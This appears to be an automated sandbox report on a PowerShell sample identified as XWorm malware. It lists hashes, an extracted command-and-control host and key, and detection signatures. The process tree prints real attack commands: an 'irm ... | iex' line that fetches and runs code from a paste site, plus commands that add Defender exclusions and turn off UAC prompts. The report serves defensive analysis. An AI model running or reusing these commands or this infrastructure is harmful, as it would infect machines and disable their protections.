Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
87s -
max time network
88s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 22:49
Static task
static1
Behavioral task
behavioral1
Sample
run.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
run.ps1
Resource
win10v2004-20250217-en
General
-
Target
run.ps1
-
Size
50B
-
MD5
a842bb38fa14cb90a9a3169e0da00d0e
-
SHA1
d8541bd2cfb386294b24c4c4e68eba269cbffcd9
-
SHA256
79a0a92cd82c5a3b0d3e8c72d1acbec46ac9677797cf751584ef5fb838e5b0ec
-
SHA512
a068a2d4945f38fdd4165089679593b60bc594bb993c0c61f3c08b6b9496f695d847f7f970793a46eaf33ffe80fd93cc3dbee889f471368b6c8bac36a0df9048
Malware Config
Extracted
xworm
running-boating.gl.at.ply.gg:49261
nTuejMBVrsDVuX5I
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023aee-45.dat family_xworm behavioral2/memory/2812-52-0x0000000000840000-0x000000000084E000-memory.dmp family_xworm -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 4680 powershell.exe 27 4680 powershell.exe 44 4680 powershell.exe 45 4680 powershell.exe -
pid Process 3228 powershell.exe 3116 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 44 4680 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2812 SVrB5SO0.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3228 powershell.exe 3228 powershell.exe 4680 powershell.exe 4680 powershell.exe 3116 powershell.exe 3116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 2812 SVrB5SO0.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3228 wrote to memory of 4680 3228 powershell.exe 86 PID 3228 wrote to memory of 4680 3228 powershell.exe 86 PID 4680 wrote to memory of 3116 4680 powershell.exe 92 PID 4680 wrote to memory of 3116 4680 powershell.exe 92 PID 4680 wrote to memory of 2812 4680 powershell.exe 107 PID 4680 wrote to memory of 2812 4680 powershell.exe 107
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/xkhQqMbj | iex"2⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord3⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\ProgramData\SVrB5SO0.exe"C:\ProgramData\SVrB5SO0.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e5090d029c342cc6d003a8a6c497806e
SHA1952d9ab187d626b4f0e47ac161050d532030e609
SHA256fb667a12c1e9af4d5cc7ecc0e6475353953ea3255378cdb02be259f369b7c71b
SHA51260d2f1b1128eea8be26e159f08413270ae1a660e78fd7e65c783dc3e8dece8d98286a06815578196bb1fcd541c067d4a144f1228f0da254bc9985fa24ad7c2a5
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5f5076bd51ad9341494ff72f200b7b390
SHA1ee124a46aeddd94baa48616d5298945465ad9350
SHA256165150c444b6f877540da64662e07acbdedf5a879566cffb77502de3dc02a0a4
SHA512e23e63762add5d1ec1fc2537cb00e3c7ef0c49366805d50259bb3316ddd4a47c225131f54b6c6870b987f7866c51a042b635e08f0b67a6eb5d83bc4baab1bcd0
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82